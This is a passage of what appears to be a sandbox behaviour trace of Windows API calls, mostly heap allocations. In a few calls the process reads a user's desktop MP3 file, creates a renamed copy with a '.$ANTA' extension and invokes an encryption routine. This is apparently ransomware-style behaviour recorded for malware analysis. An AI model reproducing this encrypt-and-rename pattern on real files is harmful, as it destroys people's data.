(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0125.558] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0125.558] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0125.559] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.559] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\qkxk.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0125.560] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.560] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0125.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0125.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.560] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0125.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0125.560] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0125.561] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0125.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0125.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.563] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0125.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0125.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0125.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0125.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0125.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0125.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.563] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\qkxk.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.564] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0125.564] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0125.564] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0125.565] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0125.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0125.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b84020 [0125.569] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0125.569] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0125.575] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x449e, lpOverlapped=0x0) returned 1 [0125.576] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0125.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1449e) returned 0x49aa010 [0125.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b84020 | out: hHeap=0x1780000) returned 1 [0125.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0125.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1449e) returned 0x49be4b8 [0125.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.580] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0125.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1449e) returned 0x49aa010 [0125.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.581] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0125.581] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0125.581] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0125.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0125.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1449e) returned 0x49aa010 [0125.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0125.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1449e) returned 0x49d2960 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.583] 